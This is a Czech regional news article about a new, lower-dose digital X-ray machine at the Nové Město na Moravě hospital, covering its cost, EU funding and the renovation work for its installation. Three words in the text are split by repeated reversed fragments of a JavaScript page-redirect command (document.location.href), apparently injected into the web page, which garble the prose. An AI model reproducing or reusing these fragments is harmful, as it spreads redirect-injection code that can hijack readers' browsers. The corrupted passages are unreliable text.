Rainbow page separator

Nový rentgen v novoměstské nemocnici je pro pacienty šetrnější

Sobota, 2. února 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Moderní rentgen začal sloužit na radiologii novoměstské nemocnice. Pro pacienty je šetrnější než předchozí typ. „Jedná se o moderní přístroj, má velmi kvalitní detek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory, má přímou digitalizaci, což umožňuje velmi dobré zobrazení s nižší radiační zátěží pro pacienta. Rentgen usnadňuje a zefektivňuje práci našich laborantů, kteří už mají za sebou všechna povinná aplikační školení a s přístrojem už umí pracovat,“ uvedla primářka radiologického oddělení novoměstské nemocnice Martina Slámová.
Pořízení přístroje za téměř šest milionů korun podpořila dotace z evropských fondů, jeho nákup byl vysoutěžen za 5,7 milionu korun. Pro jeho instalaci bylo v radiologickém oddělení nutné provést některé stavební úpravy, jež nemocnice uhradila ze svého rozpočtu a byly vyčísleny na půl milionu korun bez DPH. „Nainstalovali jsme nové okno s venkovními žaluziemi, máme novou antistatickou podlahu, v rámci rekonstrukce jsme také repasovali stávající vzduchotechniku a dveře,“ upřesnila rozsah stavebních prací mluvčí nemocnice Tamara Pecková. Mimo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo po posouzení statika třeba odstranit podhledy a pro zařízení vybudovat novou nosnou konstrukci.